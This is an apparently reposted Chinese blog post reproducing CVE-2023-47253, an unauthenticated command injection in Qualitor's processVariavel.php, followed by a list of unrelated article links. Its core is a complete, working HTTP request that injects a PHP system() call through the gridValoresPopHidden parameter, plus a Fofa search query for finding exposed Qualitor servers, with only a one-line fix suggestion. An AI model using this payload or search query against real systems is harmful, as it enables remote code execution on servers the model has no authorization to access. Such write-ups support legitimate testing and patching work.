当前位置: 首页 > news >正文

Qualitor processVariavel.php 未授权命令注入漏洞复现(CVE-2023-47253)

0x01 漏洞描述:

Qualitor 8.20及之前版本存在命令注入漏洞,远程攻击者可利用该漏洞通过PHP代码执行任意代码,利用难度较低危害较大。

0x02 影响版本:

Qualitor <= 8.20

0x03 搜索语句:

Fofa:app="Qualitor-Web"

0x04 漏洞复现:

GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system("netstat%20-ano"); HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Connection: keep-alive

 

0x05 修复建议:

对接口入参进行严格防护,限制特殊字符输入

参考:

Qualitor processVariavel.php 未授权命令注入漏洞复现(CVE-2023-47253)-CSDN博客

相关文章:

  • 从0开始深度学习(6)——Pytorch动态图机制(前向传播、反向传播)
  • Windows环境下Node.js多版本切换的实用指南
  • CS61b学习 part 2
  • element-plus中日历组件设置起始为周一
  • Java 常用的一些Collection的实现类
  • HTML和CSS做一个无脚本的手风琴页面(保姆级)
  • k8s中pod的创建过程和阶段状态
  • Spring Boot助力:小徐影院管理系统
  • 第九届人工智能创新国际会议(ICIAI 2025)即将在新加坡召开!
  • Maven超详细教程(三):Maven依赖查找顺序
  • Error: one input ui-file must be specified(问题已解决)
  • OceanBase 关于一号表笔记与ERROR 1060(42S21)问题
  • 看Threejs好玩示例,学习创新与技术(React-three-fiber)
  • 【LLM多模态】视频理解模型Cogvlm-video和MVBench评测基准
  • 在新ARM板上移植U-Boot和Linux指南
  • Android开发 - 掌握ConstraintLayout(四)创建基本约束
  • docker容器内的网络抓包
  • Dubbo 整合 Pinpoint 做分布式服务请求跟踪
  • JavaScript 无符号位移运算符 三个大于号 的使用方法
  • JavaScript的使用你知道几种?(上)
  • Javascript设计模式学习之Observer(观察者)模式
  • JS专题之继承
  • Netty+SpringBoot+FastDFS+Html5实现聊天App(六)
  • Node项目之评分系统(二)- 数据库设计
  • PHP的类修饰符与访问修饰符
  • Python打包系统简单入门
  • Spring Cloud中负载均衡器概览
  • SpringBoot 实战 (三) | 配置文件详解
  • spring学习第二天
  • webpack4 一点通
  • 初探 Vue 生命周期和钩子函数
  • 猴子数据域名防封接口降低小说被封的风险
  • 基于Android乐音识别(2)
  • 坑!为什么View.startAnimation不起作用?
  • 老板让我十分钟上手nx-admin
  • 如何学习JavaEE,项目又该如何做?
  • 如何在GitHub上创建个人博客
  • 时间复杂度与空间复杂度分析
  • 首页查询功能的一次实现过程
  • 网络应用优化——时延与带宽
  • 微信小程序--------语音识别(前端自己也能玩)
  • 赢得Docker挑战最佳实践
  • 这几个编码小技巧将令你 PHP 代码更加简洁
  • 基于django的视频点播网站开发-step3-注册登录功能 ...
  • ​ 轻量应用服务器:亚马逊云科技打造全球领先的云计算解决方案
  • (+4)2.2UML建模图
  • (八)Flask之app.route装饰器函数的参数
  • (代码示例)使用setTimeout来延迟加载JS脚本文件
  • (待修改)PyG安装步骤
  • (含笔试题)深度解析数据在内存中的存储
  • (十八)用JAVA编写MP3解码器——迷你播放器
  • (十一)JAVA springboot ssm b2b2c多用户商城系统源码:服务网关Zuul高级篇
  • (一)utf8mb4_general_ci 和 utf8mb4_unicode_ci 适用排序和比较规则场景
  • (转)AS3正则:元子符,元序列,标志,数量表达符
  • (转)MVC3 类型“System.Web.Mvc.ModelClientValidationRule”同时存在